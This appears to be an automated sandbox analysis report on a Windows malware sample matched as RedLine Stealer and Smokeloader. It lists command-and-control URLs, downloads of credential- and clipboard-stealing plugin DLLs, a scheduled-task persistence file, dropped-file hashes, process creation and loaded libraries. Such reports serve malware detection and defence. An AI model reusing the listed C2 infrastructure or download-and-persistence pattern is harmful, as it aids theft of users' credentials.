Source: Joe Sandbox View IP Address: 93.123.39.96
Source: Joe Sandbox View ASN Name: NET1-ASBG
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_00414780 InternetCloseHandle,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 0_2_00414780
Source: global traffic HTTP traffic detected: GET /8bjndDcoA3/Plugins/cred64.dll HTTP/1.1 Host: topgamecheats.dev
Source: global traffic HTTP traffic detected: GET /8bjndDcoA3/Plugins/clip64.dll HTTP/1.1 Host: topgamecheats.dev
Source: unknown DNS traffic detected: queries for: topgamecheats.dev
Source: unknown HTTP traffic detected: POST /8bjndDcoA3/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: topgamecheats.dev Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Source: Dctooux.exe, 0000001C.00000002.2886494083.0000000002E62000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/Plugins/clip64.dll
Source: Dctooux.exe, 0000001C.00000002.2886494083.0000000002EAC000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001C.00000002.2886494083.0000000002E62000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/Plugins/cred64.dll
Source: Dctooux.exe, 0000001C.00000002.2886494083.0000000002EAC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/Plugins/cred64.dlllD
Source: Dctooux.exe, 0000001C.00000002.2886494083.0000000002E62000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/Plugins/cred64.dll~
Source: Dctooux.exe, 0000001C.00000003.2467481991.0000000002EC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php
Source: Dctooux.exe, 0000001C.00000003.2467481991.0000000002EC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php$
Source: Dctooux.exe, 0000001C.00000003.2467481991.0000000002EC3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php(
Source: Dctooux.exe, 0000001C.00000002.2886494083.0000000002EAC000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001C.00000002.2886494083.0000000002E62000.00000004.00000020.00020000.00000000.sdmp, Dctooux.exe, 0000001C.00000002.2886494083.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1
Source: Dctooux.exe, 0000001C.00000002.2886494083.0000000002E62000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1//(
Source: Dctooux.exe, 0000001C.00000002.2886494083.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=11
Source: Dctooux.exe, 0000001C.00000002.2886494083.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php?scr=1h
Source: Dctooux.exe, 0000001C.00000002.2886494083.0000000002E62000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.phpJo
Source: Dctooux.exe, 0000001C.00000002.2886494083.0000000002EE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.phpW
Source: Dctooux.exe, 0000001C.00000002.2886494083.0000000002EE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.phpX
Source: Dctooux.exe, 0000001C.00000002.2886494083.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.phpd
Source: Dctooux.exe, 0000001C.00000002.2886494083.0000000002EE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.phpm
Source: Dctooux.exe, 0000001C.00000002.2886494083.0000000002EE3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://topgamecheats.dev/8bjndDcoA3/index.php~
Source: Amcache.hve.3.dr String found in binary or memory: http://upx.sf.net

System Summary

Source: 0000001C.00000002.2886462605.0000000002E24000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1841496983.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000014.00000002.1848243926.0000000002F92000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1841617088.0000000002FF2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000001C.00000002.2886785798.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000014.00000002.1848101190.0000000002EF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_0041FEA7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 0_2_0041FEA7
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 20_2_0041FEA7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 20_2_0041FEA7
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: 28_2_0041FEA7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 28_2_0041FEA7
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe File created: C:\Windows\Tasks\Dctooux.job
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll 2CAF66964F582A9A1ADD1F13205F8797F2F4E791D980000EA6B55C719C174ED2
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll 4D743335FF8CDF1E505F4BD82B0EFAFDE077B9BF0F88A615DB99FEADA880E3BA
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe C92EC1CEA5A09AF2F334A2E0D127F41827855C21C5E725AFB702EC29E705D1F3
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\810b84e2bfa3a9\clip64.dll 4D743335FF8CDF1E505F4BD82B0EFAFDE077B9BF0F88A615DB99FEADA880E3BA
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: String function: 0041B3D0 appears 123 times
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: String function: 02F5B637 appears 127 times
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: String function: 00420C62 appears 66 times
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: String function: 004212A0 appears 41 times
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: String function: 02F60EC9 appears 64 times
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: String function: 02F61507 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 02F0B637 appears 127 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 0041B3D0 appears 245 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 048E0EC9 appears 64 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 048E1507 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 00420978 appears 37 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 00420963 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 0041ABB0 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 0043C0B3 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 00420C62 appears 146 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 004212A0 appears 85 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 02F10EC9 appears 64 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 02F11507 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 048DB637 appears 127 times
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Code function: String function: 048E0BCA appears 48 times
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 732
Source: c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0000001C.00000002.2886462605.0000000002E24000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1841496983.0000000002F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000014.00000002.1848243926.0000000002F92000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1841617088.0000000002FF2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001C.00000002.2886785798.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000014.00000002.1848101190.0000000002EF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@22/77@1/1
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_02FF378E CreateToolhelp32Snapshot,Module32First, 0_2_02FF378E
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Code function: 0_2_0040B385 CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize, 0_2_0040B385
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe File created: C:\Users\user\AppData\Roaming\810b84e2bfa3a9
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Mutant created: \Sessions\1\BaseNamedObjects\810b84e2bfa3a9e2d0d81a3d2ea89e46
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7652
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2120
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3484
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe File created: C:\Users\user\AppData\Local\Temp\cbb1d94791
Source: c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: cred64.dll.28.dr, cred64[1].dll.28.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: cred64.dll.28.dr, cred64[1].dll.28.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: cred64.dll.28.dr, cred64[1].dll.28.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: cred64.dll.28.dr, cred64[1].dll.28.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: cred64.dll.28.dr, cred64[1].dll.28.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: cred64.dll.28.dr, cred64[1].dll.28.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: cred64.dll.28.dr, cred64[1].dll.28.dr Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe ReversingLabs: Detection: 78%
Source: c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Virustotal: Detection: 77%
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe File read: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe
Source: unknown Process created: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe "C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe"
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 732
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 780
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 848
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 908
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 908
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 920
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 1020
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 1080
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 1076
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Process created: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe "C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe"
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2120 -s 472
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 536
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 556
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 576
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 720
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 824
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 832
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Process created: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe "C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe"
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: msvcr100.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: mstask.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: dui70.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: duser.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: chartv.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: atlthunk.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: textinputframework.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: coremessaging.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: winsta.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: explorerframe.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\c92ec1cea5a09af2f334a2e0d127f41827855c21c5e72.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\cbb1d94791\Dctooux.exe Section loaded: propsys.dll
